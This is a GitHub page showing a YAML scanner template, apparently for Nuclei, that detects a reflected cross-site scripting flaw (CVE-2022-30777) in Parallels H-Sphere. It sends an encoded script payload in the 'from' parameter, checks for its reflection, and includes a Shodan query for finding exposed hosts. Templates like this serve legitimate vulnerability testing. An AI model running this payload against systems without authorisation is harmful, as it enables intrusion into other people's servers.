-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2022-30777.yaml
44 lines (38 loc) · 1.16 KB
/
CVE-2022-30777.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
id: CVE-2022-30777
info:
name: Parallels H-Sphere - Cross Site Scripting
author: 3th1c_yuk1
severity: medium
description: |
Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter.
reference:
- https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
- https://nvd.nist.gov/vuln/detail/CVE-2022-30777
- https://en.wikipedia.org/wiki/H-Sphere
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-30777
cwe-id: CWE-79
metadata:
shodan-query: title:"h-sphere"
verified: "true"
tags: cve,cve2022,parallels,hsphere,xss
requests:
- method: GET
path:
- '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '<TITLE>"><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200